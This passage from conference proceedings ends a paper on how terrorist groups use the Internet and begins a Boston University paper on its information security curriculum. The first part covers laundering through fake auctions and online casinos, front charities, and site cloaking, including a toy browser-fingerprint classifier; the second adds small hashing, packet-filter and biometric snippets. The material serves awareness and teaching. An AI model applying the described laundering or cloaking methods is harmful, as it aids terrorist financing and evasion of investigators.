to make donations and contribute to the funding of activities. Visitors to such websites are monitored<br />
and researched. Repeat visitors or individuals spending extended periods on the websites are<br />
contacted (Piper 2008). These individuals are guided to secret chat rooms or instructed to download<br />
specific software that enables users to communicate on the Internet without being monitored<br />
(Nordeste, Carment 2006).<br />
However, malicious or disguised methods of fundraising are also possible. Electronic money transfer,<br />
laundering and generating support through front organisations are all fundraising methods used by<br />
terrorists (Goodman, Kirk & Kirk 2007). According to the Financial Action Task Force, “the misuse of<br />
nonprofit organizations for the financing of terrorism is coming to be recognized as a crucial weak<br />
point in the global struggle to stop such funding at its source” (Jacobson 2009). Examples of such<br />
undertakings include Mercy International, Rabita Trust, Global Relief Fund, and Help the Needy<br />
(Conway 2006). Some charities are founded with the express purpose of financing terror, while others<br />
are existing entities that are infiltrated by terrorist supporters from within (Jacobson 2009).<br />
Other methods related to fundraising include online auctioneering to move money around. This<br />
involves two partners, known as smurfs, who arrange a fake transaction. One partner bids on an item<br />
and pays the auction amount to the auction house. The other partner receives payment for the fake<br />
auction item. There are also scams where users bid on their own items in an effort to store money and<br />
prevent detection (Whelpton 2009). In one specific auction, a set of second-hand video games were<br />
offered for $200, whilst the same set could be purchased brand new from the publisher for $39.99<br />
(Tibbetts 2002). Although the ludicrously high selling price is not illegal, this item will only attract<br />
selected attention from a trusted agent. This allows terrorist groups to move money around without<br />
actually delivering the auctioned goods or services.<br />
Online casinos can be used for both laundering and storing money. When dealing with large sums of<br />
money, terrorists can place it in an online gambling site. Small bids are made to ensure activity, while<br />
the rest of the money is safely stored and hidden (Whelpton 2009). Alternatively, any winnings can be<br />
cashed in and transferred electronically to bank accounts specifically created for this purpose<br />
(Jacobson 2009).<br />
Stolen credit cards can help to fund many terrorist activities. For example, Irhabi 007 and his<br />
accomplice accumulated 37 000 stolen credit card numbers, making more than $3.5 million in charges<br />
(Jacobson 2009). In 2005, stolen credit card details were used to purchase domain space, with the<br />
request stemming from Paris. When a similar request for nearby domain space was made shortly<br />
after the initial one, under another name in Britain, it was detected as fraud and the backup files<br />
of the initial site were investigated. Although the files were mostly in Arabic, the video footage included<br />
insurgent forces clashing with American forces, depicting the Iraqi conflict from the attacker’s point of view<br />
(Labi 2006).<br />
Drug trafficking is considered a large income source for terrorist groups. Fake Internet drugs are<br />
trafficked, containing harmful ingredients such as arsenic, boric acid, leaded road paint, polish, talcum<br />
powder, chalk and brick dust. In an elaborate scheme, Americans were tricked into believing they were<br />
buying Viagra, but instead received fake drugs. The money paid for these drugs is used to fund<br />
Middle Eastern terrorism. The UK Medicines and Healthcare products Regulatory Agency reports that up to 62%<br />
of the prescription medicine on sale on the Internet without requiring a prescription is fake<br />
(Whelpton 2009).<br />
3.5 Other examples of the exploitation of the ICT infrastructure<br />
Kovner (in Lachow, Richardson 2007) discusses one of al Qaeda’s goals of using the Internet to<br />
create resistance blockades to prevent Western ideas from corrupting Islamic institutions. In some<br />
instances, Internet browsers designed to filter out content from undesirable Western sources were<br />
distributed without users being aware of it. Brachman also discusses jihadi computer programmers<br />
launching browsing software, similar to Internet Explorer, that searches only particular sites and thus<br />
restricts the freedom to navigate to certain online destinations (2006).<br />
Another technique from the infamous terrorist Irhabi 007 was to exploit vulnerabilities in FTP servers,<br />
reducing the risk of exposure and saving money. Irhabi dumped files (with videos of Bin Laden and<br />
9/11 hijackers) onto an FTP server at the Arkansas State Highway and Transportation Department and<br />
then posted links warning users of the limited window of opportunity to download (Labi 2006).<br />
SITE (in Brachman 2006) discovered a guide for jihadis to use the Internet safely and anonymously.<br />
This guide explains how governments identify users and penetrate their usage of chat programs<br />
(including Microsoft Messenger and Paltalk), and advises readers not to use Saudi Arabian based<br />
email addresses (ending with .sa) due to their insecure nature. Readers are advised to instead register<br />
anonymous accounts with commercial providers like Hotmail or Yahoo!.<br />
Cottrell in 2006 (in Dizard 2006) discusses the following emerging cloaking trends:<br />
Terrorist organisations host bogus websites that mask their covert information or provide<br />
misleading information to users they identify as federal employees or agents;<br />
Criminal and terrorist organisations are increasingly blocking all traffic from North America or from<br />
IP addresses that point back to users who rely on the English language;<br />
Another cloaking practice is the provision of fake passwords at covert meetings. When one of the<br />
fake passwords is detected, the user is flagged as a potential federal intelligence agent who has<br />
attended the meetings, which in turn makes them vulnerable to being kidnapped or becoming the<br />
unwitting carriers of false information; and<br />
Another method was used in a case in which hackers set a number of criteria that they all shared:<br />
using the Linux operating system and the Netscape browser, among other factors. When federal<br />
investigators using computers running Windows and using Internet Explorer visited the hackers'<br />
shared site, the hackers' system immediately mounted a distributed denial-of-service attack<br />
against the federal system.<br />
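The last trend above amounts to serving different responses based on a browser fingerprint. A toy version of such a check might look as follows; the token lists are invented for illustration, and the reported systems responded with an attack rather than a harmless label.<br />

```python
# Hypothetical fingerprint profiles derived from the User-Agent header.
REQUIRED_TOKENS = ("X11", "Linux")    # agreed profile of group members' browsers
BLOCKED_TOKENS = ("Windows", "MSIE")  # profile attributed to investigators' machines

def classify_visitor(user_agent: str) -> str:
    """Label a visitor from the User-Agent header alone."""
    if any(tok in user_agent for tok in BLOCKED_TOKENS):
        return "flagged"    # in the reported case, this branch triggered a counter-attack
    if all(tok in user_agent for tok in REQUIRED_TOKENS):
        return "member"
    return "unknown"
```

Because the User-Agent header is client-supplied and trivially spoofed, such fingerprinting is a weak access control, which is why it was combined with the other shared criteria mentioned above.<br />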
Sometimes communication between terrorists occurs through a special code developed by the group<br />
itself. By using inconspicuous words and phrases, it is possible to deliver these messages in a public<br />
forum without attracting untoward attention. For example, Mohammed Atta’s final message to the<br />
other eighteen terrorists who carried out the attacks of 9/11 is reported to have read: “The semester<br />
begins in three more weeks. We’ve obtained 19 confirmations for studies in the faculty of law, the<br />
faculty of urban planning, the faculty of fine arts, and the faculty of engineering.” The reference to the<br />
various faculties is code for the buildings targeted in the attacks (Weimann 2005).<br />
Defacing websites is a popular way for terrorist groups to demonstrate their technical capability and<br />
create fear. These defacements often take the form of public alterations of a website that are visible to<br />
a large audience. An example of such an attack took place in 2001, when a group known as the<br />
Pentaguard defaced a multitude of government and military websites in the UK, Australia, and the<br />
United States. “This attack was later evaluated as one of the largest, most systematic defacements of<br />
worldwide government servers on the Web”. Other examples include pro-Palestinian hackers using a<br />
coordinated attack to break into and deface 80 Israel-related sites, and al Qaeda<br />
depositing images of the murdered Paul Marshall Johnson, Jr. on the hacked website of Silicon<br />
Valley Landsurveying, Inc (Brunst 2010).<br />
Namosha Veerasamy and Marthie Grobler<br />
4. Conclusion<br />
The use of the Internet by terrorist groups has expanded to encompass both traditional Internet usage<br />
and more innovative uses of traditional and new Internet functions. Global terrorist groups can now<br />
electronically target an enormous number of potential recipients, recruits and enemies. Terrorist<br />
groups often embrace the opportunities that technological innovation brings about in order to advance<br />
their own operations.<br />
This paper is informative in nature, aiming to make the public aware of the potential that ICT<br />
infrastructure has in assisting terrorist groups in their operations and normal functions. These<br />
functions include all the processes from recruitment and training of new members, communicating<br />
with existing members, planning and executing operations, distributing propaganda, fund raising and<br />
carrying out psychological warfare. Due to the unique nature of the Internet, many of these traditional<br />
and innovative Internet uses can be carried out in either a uni-directional or bi-directional fashion,<br />
depending on the nature of the communication required.<br />
Based on this research, it can be seen that international terrorist groups can use the Internet in most<br />
of their daily functions to facilitate the growth and operation of the groups. In a sense, terrorist groups<br />
can actively exploit the existing ICT infrastructure to advance their groups. This paper discussed<br />
specific instances and provided examples of this exploitation through web literature use, social-networking<br />
tools, anti-forensic techniques and novel fundraising methods. In conclusion, further<br />
research may be done to identify ways in which these innovative uses of the Internet can be turned to<br />
counter terrorist attacks, rather than only support them.<br />
References<br />
Atwan, A. (2006), The secret history of al Qaeda, 1st edn, University of California Press, California.<br />
Bass, R. & Ho, S.M. (2007), AP: 1M archived pages removed post-9/11.<br />
Brachman, J.M. (2006), "High-tech terror: Al-Qaeda's use of new technology", Fletcher Forum of World Affairs,<br />
vol. 30, pp. 149.<br />
Brunst, P.W. (2010), "Terrorism and the Internet: New Threats Posed by Cyberterrorism and Terrorist Use of the<br />
Internet", in A war on terror?, Springer, pp. 51-78.<br />
Carr, J. (2007), Anti-Forensic Methods Used by Jihadist Web Sites.<br />
Coll, S. & Glasser, S.B. (2005), "Terrorists turn to the Web as base of operations", The Washington Post, vol. 7,<br />
pp. 77–87.<br />
Conway, M. (2006), "Terrorist 'Use' of the Internet and Fighting Back", Information and Security, vol. 19, pp. 9.<br />
Dizard, W.P. (2006), Internet "cloaking" emerges as new Web security threat, Government Computer News.<br />
Goodman, S.E., Kirk, J.C. & Kirk, M.H. (2007), "Cyberspace as a medium for terrorists", Technological<br />
Forecasting and Social Change, vol. 74, no. 2, pp. 193-210.<br />
Internet World Stats 2010, May 27, 2010-last update, Internet usage statistics - The internet big picture: World<br />
internet users and population stats. Available: http://www.internetworldstats.com/stats.htm [2010, 06/08] .<br />
Jacobson, M. (2009), "Terrorist financing on the internet", CTC Sentinel, vol. 2, no. 6, pp. 17-20.<br />
Jamestown Foundation (2006), Next Stage in Counter-Terrorism: Jihadi Radicalization on the Web.<br />
Kimmage, D. & Ridolfo, K. (2007), "Iraqi Insurgent Media. The War of Images and Ideas. How Sunni Insurgents<br />
in Iraq and Their Supporters Worldwide are Using the Media", Washington, Radio Free Europe/Radio<br />
Liberty.<br />
Labi, N. (2006), "Jihad 2.0", The Atlantic Monthly, vol. 102.<br />
Lachow, I. & Richardson, C. (2007), "Terrorist use of the Internet: The real story", Joint Force Quarterly, vol. 45,<br />
pp. 100.<br />
Lau, S. (2003), "An analysis of terrorist groups' potential use of electronic steganography", Bethesda, Md.:<br />
SANS Institute, February, pp. 1-13.<br />
Noguchi, Y. & Goo, S. (2006), Terrorists’ Web Chatter Shows Concern About Internet Privacy, Wash.<br />
Nordeste, B. & Carment, D. (2006), "Trends in terrorism series: A framework for understanding terrorist use of<br />
the internet", ITAC, vol. 2006-2, pp. 1-21.<br />
Piper, P. (2008), Nets of terror: Terrorist activity on the internet. Searcher, vol.16, issue 10.<br />
Tibbetts, P.S. (2002), "Terrorist Use of the Internet and Related Information Technologies", Army Command And<br />
General Staff Coll Fort Leavenworth Ks School Of Advanced Military Studies, pp. 1-67.<br />
Weimann, G. (2009), "Virtual Terrorism: How Modern Terrorists Use the Internet", Annual Meeting of the<br />
International Communication Association, Dresden International Congress Centre, Dresden.<br />
Weimann, G. (2005), "How modern terrorism uses the internet", The Journal of International Security Affairs, vol.<br />
Spring 2005, no. 8.<br />
West, D. & Latham, C. (2010), "The Extremist Edition of Social Networking: The Inevitable Marriage of Cyber<br />
Jihad and Web 2.0", Proceedings of the 5th International <strong>Conference</strong> on Information Warfare and Security,<br />
ed. L. Armistead, <strong>Academic</strong> <strong>Conference</strong>s.<br />
Whelpton, J. (2009), "Psychology of Cyber Terrorism" in Cyberterrorism 2009 Seminar Ekwinox, South Africa.<br />
Evolving an Information Security Curriculum: New<br />
Content, Innovative Pedagogy and Flexible Delivery<br />
Formats<br />
Tanya Zlateva, Virginia Greiman, Lou Chitkushev and Kip Becker<br />
Boston University, USA<br />
zlateva@bu.edu<br />
ggreiman@bu.edu<br />
ltc@bu.edu<br />
kbecker@bu.edu<br />
Abstract: In the last ten years information security has been recognized as one of the most important new fields by<br />
academia, government and industry. The need for educating information security professionals has increased<br />
dramatically and is not being met despite the recent growth of cyber security programs. The challenge of designing<br />
and evolving multi-disciplinary curricula that provide theoretical as well as hands-on experience and are<br />
available to a broad student audience is of strategic importance for the future of reliable and secure systems. We<br />
present our experience in designing and evolving information security programs that have grown to over 650<br />
students per year since their inception eight years ago and have graduated more than 250 students. We discuss<br />
three major directions in the evolution of the program: the increased focus of the core and growth of<br />
concentration electives, the design of a cyber law curriculum and coordination with the business continuity<br />
programs, and the introduction of new educational technologies such as virtualization and video-collaboration<br />
and flexible online and blended delivery formats. The rapid growth of the program, the changes in the discipline<br />
and the great diversity of professional interests of our students required broadening of the curriculum with<br />
courses and modules on emerging technologies such as digital forensics, biometrics, security policies and<br />
procedures, privacy and security in health care, cyber law, as well as the coordination of the curriculum with<br />
existing programs in business continuity. Special efforts were devoted to the introduction of more participatory<br />
pedagogy, more specifically by developing a series of virtual laboratories that brought real-world situations into the<br />
classroom and through video-collaboration tools that encourage team building. The accessibility of the<br />
programs was increased through the introduction of flexible delivery formats. After establishing the programs in<br />
the traditional classroom, we added a blended and online version that rapidly found a national audience.<br />
Keywords: information security education, digital forensics, cyber law, virtualization, business continuity, online<br />
and blended learning<br />
1. Introduction<br />
The strong and steadily increasing reliance on a globally distributed computational infrastructure in<br />
virtually all areas of human endeavor—business, industry, government, defense, health care, and<br />
even the individual’s social interactions—has made security and reliability of vital importance and has<br />
sharply increased the need for information security professionals. This need is not being met despite<br />
the recent growth of cyber security programs. The reasons lie in the complexity of the task, which<br />
requires building an interdisciplinary curriculum that integrates knowledge domains as diverse as<br />
cryptography, ethics, engineering, management and law. An additional challenge is the unusually<br />
large gap between theory (e.g. cryptographic algorithms) and practical skills (e.g. setting up a<br />
firewall), which calls for imaginative and effective ways to bring real-world experience into the classroom.<br />
This paper presents and discusses our experience in establishing and growing the information<br />
security concentrations in the Master’s programs in Computer Science, Computer Information<br />
Systems, and Telecommunication at Boston University that are offered through BU’s Metropolitan<br />
College. The programs are certified by the Committee on National Security Systems. Since the<br />
introduction of the security curriculum in 2002 enrollments in our security courses grew to over 650<br />
per year and more than 250 students have completed their Master’s degree with a concentration in<br />
security. We trace the evolution of the programs in three major directions: the broadening and<br />
diversification of the curriculum, developing a cyber law course and coordinating the curriculum with<br />
programs in business continuity, and introducing new educational technologies (more specifically<br />
virtualization and video-collaboration) and flexible online and blended delivery formats.<br />
2. Design principles, structure, and initial curriculum<br />
We started introducing information security themes in the curriculum in the late 1990s and formally<br />
introduced an information security concentration in the Master’s programs of Computer Science,<br />
Computer Information Systems and Telecommunication in 2002. The central goal of the program was<br />
to draw upon the resources of a large research university and to give students the academic<br />
knowledge and technical skills as well as to develop their ability to identify and solve security<br />
problems in their multi-disciplinary complexity taking into account technical, managerial, legal, and<br />
ethical aspects of information security. We emphasized from the outset an interdisciplinary design<br />
approach with strong laboratory and experiential components; a program scope that embraces<br />
contributions from multiple fields; and a program structure that integrates information assurance<br />
concepts, topics, and methods throughout the curriculum as opposed to predominantly in specialized<br />
courses (Zlateva et al., 2003). The integration of information assurance topics across the curriculum is<br />
conducted at three levels (Table 1):<br />
First, the fundamental information assurance topics are taught within the existing core courses at<br />
the undergraduate and graduate level. This ensures that all students are equipped with the basic<br />
knowledge of information security that is currently indispensable for any professional working in<br />
computer software, hardware, systems, or networks.<br />
Second, specialized semester long courses—such as information security, network security,<br />
database security, cryptography, biometrics, digital forensics, etc. —provide in-depth analysis of<br />
different security aspects. These courses provide the core for concentrators in information<br />
security and are available as electives to students outside the information security concentration.<br />
Third, advanced specialized courses—such as web applications, web services, enterprise<br />
computing, mobile applications, data mining etc. —include cyber security topics and modules.<br />
Our Master’s programs consist of ten four-credit courses, and a concentration requires the<br />
completion of four courses, typically three specialized courses that provide depth and one related high-level<br />
elective for breadth. When first introduced in 2002 the security concentrations in the MS in CS, CIS,<br />
and TC were based on five specialized courses— cryptography, computer networks and security,<br />
information systems security, database security, and network management and computer security<br />
(Table 1).<br />
The programs were well received and grew rapidly. From a curriculum point of view we soon<br />
recognized two related trends both of which required the introduction of new security topics and<br />
further development of the curriculum both in depth and breadth. From the point of view of pedagogy<br />
and access it became clear that novel online technologies such as virtualization and<br />
video-collaboration can increase the impact of content presentation and that new delivery formats, such as<br />
hybrid or distance learning, can make the program available to students at remote locations or who<br />
are unable to attend on-campus classes due to demanding work schedules. In the following we first<br />
discuss the evolution of the curriculum and then the novel teaching approaches.<br />
The large majority of students in our programs are information technology professionals and a<br />
considerable number are already involved in information security. From the very beginning of the<br />
programs their interests ranged from biometrics to digital forensics on the technical side, and from<br />
security policies to legal and regulatory issues on the managerial and organizational side. At the same<br />
time the information security field was rapidly evolving, maturing, and its importance was becoming<br />
widely recognized. Both these factors required us to deepen the theoretical and applied knowledge of<br />
the core, to update and broaden the curriculum with topics and/or courses on emerging<br />
technologies, and to seek synergies with programs that focus on related and complementary fields.<br />
Depth was achieved by restructuring the teaching of security fundamentals and adding a course on<br />
network security in recognition of the central importance that global networks play in the modern<br />
world. Breadth was achieved by introducing a four-course certificate in digital forensics, a new course<br />
in biometrics and a number of specialized content modules in the advanced courses. In collaboration<br />
with the administrative sciences department we are currently exploring synergies with the<br />
concentration in Business Continuity, Security, and Risk Management and the introduction of a new<br />
course on cyber law.<br />
Table 1: Structure and evolution of the security curriculum (the top and bottom rows list the<br />
curriculum-wide security modules; the middle box lists the concentration courses, with the<br />
initial 2002 courses and the later additions shown separately)<br />
Information security modules in core undergraduate and graduate courses<br />
(intro programming and data structures, operating systems, data communications and networks,<br />
databases, algorithms, software engineering)<br />
Information Security Concentration Courses<br />
Initial courses (2002): Computer and Network Security (CS654); Information Systems Security<br />
(CS684); Database Security (CS674); Cryptography (CS786); Network Management and Computer<br />
Security (TC685)<br />
Added courses: Enterprise Information Security (CS695); Network Security (CS690); IT Security<br />
Policies and Procedures (CS684); Advanced Cryptography (CS799); Biometrics (CS599); Digital<br />
Forensics and Investigations (CS693); Network Forensics (CS703); Advanced Digital Forensics<br />
(CS713); Network Performance and Management (CS685)<br />
Electives<br />
Information security modules in high-level courses (web application development, web services,<br />
enterprise computing, mobile applications, data mining, biomedical information technology,<br />
electronic health records)<br />
3. Evolving the information security curriculum<br />
3.1 Focusing and expanding the concentration courses<br />
Initially we provided the security fundamentals in a single course that came in two flavors—a<br />
Computer and Network Security course for the MS in CS and CIS programs and a Network<br />
Management and Computer Security course tailored to the needs of the telecommunication program.<br />
Two years into the program this structure became insufficient for accommodating the growing body of<br />
knowledge in security models and protocols and especially in network security. We restructured the<br />
curriculum by consolidating enterprise security topics into a single course required for all<br />
concentrations and dedicating a full course on network security. The Network Management and<br />
Computer Security course of the telecommunication degree was revised into a Network Performance<br />
and Management course, which retained an emphasis on security and was moved into the core. (Table 1<br />
shows the evolution of the curriculum; the program and course descriptions are available at the<br />
web site of Boston University (2010a).)<br />
The new Enterprise Information Security course lays a solid academic basis for the understanding of<br />
security issues in computer systems, networks, and applications. It discusses formal security models<br />
and their application in operating systems; application level security with focus on language level<br />
security and various security policies; introduction to conventional and public keys encryption,<br />
authentication, message digest and digital signatures, and an overview of Internet and intranet topics.<br />
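The digest and authentication topics above can be illustrated with Python's standard library. A keyed HMAC stands in here for a digital signature (true signatures require asymmetric keys, which the standard library does not provide); the message and key are illustrative:<br />

```python
import hashlib
import hmac

message = b"an illustrative message"

# Message digest: a fixed-length fingerprint of the message.
digest = hashlib.sha256(message).hexdigest()

# Keyed digest (HMAC): authenticates the message between two parties
# sharing a secret key.
key = b"shared-secret"
tag = hmac.new(key, message, hashlib.sha256).hexdigest()

# Verification recomputes the tag and compares in constant time.
assert hmac.compare_digest(tag, hmac.new(key, message, hashlib.sha256).hexdigest())

# Any change to the message yields a completely different digest.
assert hashlib.sha256(message + b"!").hexdigest() != digest
print(len(digest))  # 64 hex characters = 256 bits
```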
The Network Security course expands on the fundamentals (security services, access controls,<br />
vulnerabilities, threats and risk, network architectures and attacks) through a discussion on network<br />
security capabilities and mechanisms (access control on wire-line and wireless networks), IPsec,<br />
firewalls, deep packet inspection and transport security. It then addresses network application security<br />
(email, ad-hoc, XML/SAML and Services Oriented Architecture security).<br />
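The access-control mechanisms discussed in these courses can be sketched as a minimal first-match packet filter; the rule set below is a hypothetical illustration, not any real firewall configuration:<br />

```python
# Minimal first-match packet filter: rules are checked in order and the
# first matching rule decides the packet's fate. Purely illustrative.
from dataclasses import dataclass

@dataclass
class Rule:
    action: str     # "allow" or "deny"
    proto: str      # "tcp", "udp", or "*" for any protocol
    dst_port: int   # destination port, or 0 for any port

RULES = [
    Rule("allow", "tcp", 443),  # permit HTTPS
    Rule("allow", "tcp", 22),   # permit SSH
    Rule("deny", "*", 0),       # default deny
]

def filter_packet(proto: str, dst_port: int) -> str:
    for rule in RULES:
        if rule.proto in ("*", proto) and rule.dst_port in (0, dst_port):
            return rule.action
    return "deny"  # fail closed if no rule matches

print(filter_packet("tcp", 443))  # allow
print(filter_packet("udp", 53))   # deny (falls through to default rule)
```

Placing the default-deny rule last mirrors the fail-closed posture taught in network security: anything not explicitly permitted is rejected.<br />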
A new course on IT Security Policies and Procedures evolved from and replaced the Information<br />
System Security course by shifting the focus to methodologies for identifying, quantifying, mitigating<br />
and controlling security risks, the development of IT risk management plans, standards, and<br />
procedures that identify alternate sites for processing mission-critical applications, and techniques to<br />
recover infrastructure, systems, networks, data and user access.<br />
3.2 Adding security electives<br />
Elective courses on specialized security topics were added based on student interests and emerging<br />
technologies. In response to an early and sustained interest in digital forensics we developed first a<br />
course and then a Graduate Certificate in Digital Forensics (Boston University 2010a) that can be<br />
taken as a stand-alone or as part of the MS degree. The certificate consists of a required Business<br />
Data and Communication Network course and three forensics courses that build on each other:<br />
Digital Forensics and Investigations (CS693) introduces the investigative process, available<br />
hardware and software tools, digital evidence controls, data acquisition, computer forensic<br />
analysis, e-mail investigations, image file recovery, investigative report writing, and expert witness<br />
requirements.<br />
Network Forensics (CS703) explores the relationship between network forensic analysis and<br />
network security technologies, identification of network security incidents and potential sources of<br />
digital evidence, basic network data acquisition and analysis.<br />
Advanced Digital Forensics (CS713) discusses malicious software, reverse engineering<br />
techniques for conducting static and dynamic forensic analysis on computer systems and<br />
networks, legal considerations, digital evidence controls, and documentation of forensic<br />
procedures.<br />
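The digital evidence controls and data acquisition topics in these courses rest on cryptographic hashing: hashes recorded at acquisition time let an examiner later prove the evidence is unchanged. A minimal sketch (the hash algorithms and data are illustrative):<br />

```python
import hashlib

def acquisition_hashes(data: bytes) -> dict:
    """Hash values typically recorded when acquiring a disk image,
    so later analysis can demonstrate the copy is unaltered."""
    return {
        "md5": hashlib.md5(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
    }

image = b"\x00" * 512  # stand-in for an acquired disk sector
record = acquisition_hashes(image)

# Integrity check: re-hashing the working copy must reproduce the record.
assert acquisition_hashes(image) == record

# A single altered byte breaks the match, revealing tampering.
tampered = image[:-1] + b"\x01"
assert acquisition_hashes(tampered) != record
print(record["sha256"][:16])
```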
A Biometrics (CS599) course was developed in response to the increased significance of biometric<br />
approaches and their integration in traditional security schemes. The course presents fundamental<br />
methods for designing applications based on various biometrics (fingerprints, voice, face, hand<br />
geometry, palm print, iris, retina), multimodal approaches, privacy aspects relating to the use of<br />
biometric data, and system performance issues.<br />
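Threshold-based matching, central to all of these biometric modalities, can be sketched as follows; the bit strings and threshold are illustrative miniatures (iris codes, for example, are compared by Hamming distance over thousands of bits):<br />

```python
# Illustrative threshold-based biometric matcher using normalized
# Hamming distance between binary templates. All values are toy examples.

def hamming_fraction(a: str, b: str) -> float:
    """Fraction of positions at which two equal-length bit strings differ."""
    assert len(a) == len(b)
    return sum(x != y for x, y in zip(a, b)) / len(a)

# Lowering the threshold reduces false accepts but raises false rejects;
# this trade-off is a core system performance issue in the course.
THRESHOLD = 0.32  # illustrative value

def match(template: str, sample: str) -> bool:
    return hamming_fraction(template, sample) <= THRESHOLD

enrolled = "1011001110100101"
same_user = "1011001110100111"  # one bit of sensor noise: distance 0.0625
impostor = "0100110001011010"   # complement of enrolled: distance 1.0

print(match(enrolled, same_user), match(enrolled, impostor))  # True False
```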
Based on industry demand from high-tech Boston area companies we developed an Advanced<br />
Cryptography (CS799) elective course that expanded the coverage of cryptographic algorithms to<br />
include elliptic curves, block ciphers, the data encryption standard (DES) and double and triple DES,<br />
the advanced encryption standard (AES), cryptographic hash functions (SHA-512 and WHIRLPOOL),<br />
and key management issues.<br />
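The behavior of the cryptographic hash functions covered in the course is easy to demonstrate with Python's standard library; the inputs below are illustrative:<br />

```python
import hashlib

# SHA-512 produces a 512-bit digest, rendered as 128 hex characters.
h1 = hashlib.sha512(b"advanced cryptography").hexdigest()
h2 = hashlib.sha512(b"advanced cryptographY").hexdigest()

print(len(h1))   # 128
# Avalanche effect: changing one input character yields an unrelated digest.
print(h1 != h2)  # True
```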
In addition to these new courses we developed security modules in the high-level electives, including<br />
web application development, web services, enterprise computing, mobile applications, data mining,<br />
and most recently in the courses on biomedical information technology and electronic health records<br />
of our new concentration in Health Informatics.<br />
4. Relating technological aspects to cyber law and business continuity<br />
The importance of protecting information for achieving business success has always been recognized<br />
by the business community but it has reached a new dimension since cyberspace became the<br />
preferred medium for business transactions. Expenses for information security systems continue to<br />
grow and it has been found that quality of information security impacts the financial value of<br />
companies. According to McAfee (2006) United States companies spend as much on information<br />
technology annually as they do on offices, warehouses and factories combined and these<br />
expenditures tend to increase. According to Cavusoglu et al. (2004) firms that experienced internet<br />
security breaches lost an average of 2.1% of their market value within two days, and subsequent<br />
studies confirmed the sensitivity of financial performance to security breaches.<br />
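To make the 2.1% figure concrete, a back-of-the-envelope computation for a hypothetical firm (the market capitalization below is an assumption, not data from the study):<br />

```python
# Hypothetical illustration of the Cavusoglu et al. (2004) finding:
# a breached firm losing 2.1% of market value within two days.
market_cap = 10_000_000_000     # assumed $10 billion market capitalization
loss = market_cap * 21 // 1000  # 2.1%, computed exactly with integers
print(f"${loss:,}")             # $210,000,000
```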
The threat of cyber espionage and cyber war is not anymore restricted to expert forums but has<br />
become part of the public discussion. The increased number and sophistication of cyber-attacks<br />
clearly indicate that these attacks originate from professionally run business and government<br />
organizations. Estimates about the degree of the threat may vary—Clarke (2010) posits that cyber<br />
armies are being set up in Russia, China, Israel, North Korea and Iran, while others believe the goal is<br />
espionage rather than cyber war. However, no one disputes the large negative impact an information security<br />
breach can cause to the economy, government, or the individual.<br />
These development trends clearly indicate that cyber law, business continuity and risk management<br />
provide an indispensable context for framing information security problems and are an integral part of<br />
finding effective solutions. A collaborative effort between the BU MET Computer Science and<br />
Administrative Sciences Department is currently under way for developing a new course in cyber law<br />
and for coordinating the curriculum of the information security concentrations in the MS program in<br />
CS, CIS, and TC with an existing graduate certificate and specialization in Business Continuity,<br />
Security and Risk Management (Boston University 2010b).<br />
4.1 Law and regulation of information security<br />
As technology evolves so must the law. The alleged obsolescence of legal rules in computers and the<br />
Internet among other technologically advanced fields is well recognized in legal scholarship (Moses<br />
2007; Downing 2005). Because the resolution of legal problems is typically left to the chosen dispute<br />
resolution bodies, it is most important to identify in advance the types of legal problems that frequently<br />
follow technological change (Moses 2007; Lessig 1995). Some of the more important questions<br />
arising in relation to information security include:<br />
Defining the technological advancements needed to secure greater protections to the citizens and<br />
communities from cyber-attacks;<br />
Determining who can best regulate the Internet environment and control activity in cyberspace in<br />
a sovereign world;<br />
Constructing with law enforcement and the intelligence communities, an effective means of<br />
sharing actionable information with the private sector (Chander 2002);<br />
Establishing an ethics and conflict policy governing cyber activity and information security to<br />
address cultural change; and<br />
Understanding the ways in which the rise of online interaction alters the balance of power among<br />
individuals, corporations, and government, and how our choice of legal regime should be<br />
influenced by these changes (Chander 2002).<br />
We approach the development of the new information security course by framing a course<br />
methodology and structuring the topics around the areas of the global regulatory environment,<br />
computer crime regulations in the US, jurisprudence over cyber space, culture and information<br />
security, cyber forensics and internet evidence, and international responsibility.<br />
Framing an Information Security Law Curriculum Methodology.<br />
Significantly, the global economy has expanded our vulnerability to manipulation of our software and<br />
hardware through a new phenomenon known as "the global supply chain", which increases the number<br />
of actors and the complexity of understanding the legal environment from both a domestic and global<br />
perspective. Technology today passes through many hands, including design, manufacture,<br />
distribution, transportation, wholesale, retail, installation, repair services and firmware updates. To<br />
prevent these vulnerabilities we must focus on better system design, supply chain management,<br />
information security practices, public-private partnerships, law enforcement, intelligence and, most<br />
important, the education of users, employees and management.<br />
The primary pedagogical approach to teaching information security law at Boston University is<br />
the Socratic method. Diverse Socratic methodologies are used to develop critical thinking<br />
skills, including inquiry and debate, examination of complex real-life cybersecurity problems and<br />
ethical concerns, and conflict and contractual analysis. The case studies are derived primarily from<br />
court opinions both domestic and foreign, and are used to provoke discussion, develop problem<br />
solving skills, introduce the importance of team work and assist in attitudinal development. The goal is<br />
to extract and apply important principles of law as well as practical knowledge needed to prevent,<br />
track and enforce cybersecurity laws across jurisdictions. A critical component of the course is the<br />
development of a research project by the students that will highlight emerging topics which will draw<br />
not only upon class discussions but will require the development of a proposal that will advance<br />
innovation and improvement in our current technological and legal structures to combat breaches of<br />
cybersecurity.<br />
The curriculum allows students to progress from a basic understanding of the complex legal system<br />
governing cybersecurity to an overview of the methodologies, technological forensics and<br />
enforcement tools that governments need to fight cybersecurity violations both domestically and<br />
globally. The module includes analyzing legal authorities and boundaries in engaging adversarial<br />
cyber activities, examining cybersecurity forensics and issues in global prosecution and<br />
enforcement, understanding the advantages and the limitations of private v. public regulation in the<br />
cybersecurity field and identifying ethical, political and cultural concerns in the legal systems of<br />
various countries and developing recommendations for the improvement and harmonization of global<br />
cybersecurity legal systems. A few examples of the key topics incorporated into the module include:<br />
the ability of law enforcement to access stored communications controlled by a third party such as a<br />
service provider or an employer; whether an interception can include acquisition of stored<br />
communications; the definition of electronic storage; the use of surveillance in national security<br />
investigations; the application of the federal Computer Fraud and Abuse Act (CFAA) extraterritorially;<br />
the collection of data from online transactions; the admissibility of electronic evidence; expedited<br />
preservation of computer data; and cross border searches and seizures.<br />
The above topics are of immediate significance for all industries, government and academia, as internet<br />
technologies have become an operational standard in our professional and private life. Knowledge of<br />
the essentials of information security law is an important requirement for all students today to be<br />
effective and successful in their chosen professions. Teaching information security law is about<br />
awareness, prevention and understanding the risks inherent in cyber attacks and cyberterrorism, as<br />
illustrated recently when U.S. military organizations denied access to websites carrying<br />
classified documents released by Wikileaks and leading news organizations. Cyberspace is regulated<br />
through a complex network involving various modalities of constraint that include the legal and<br />
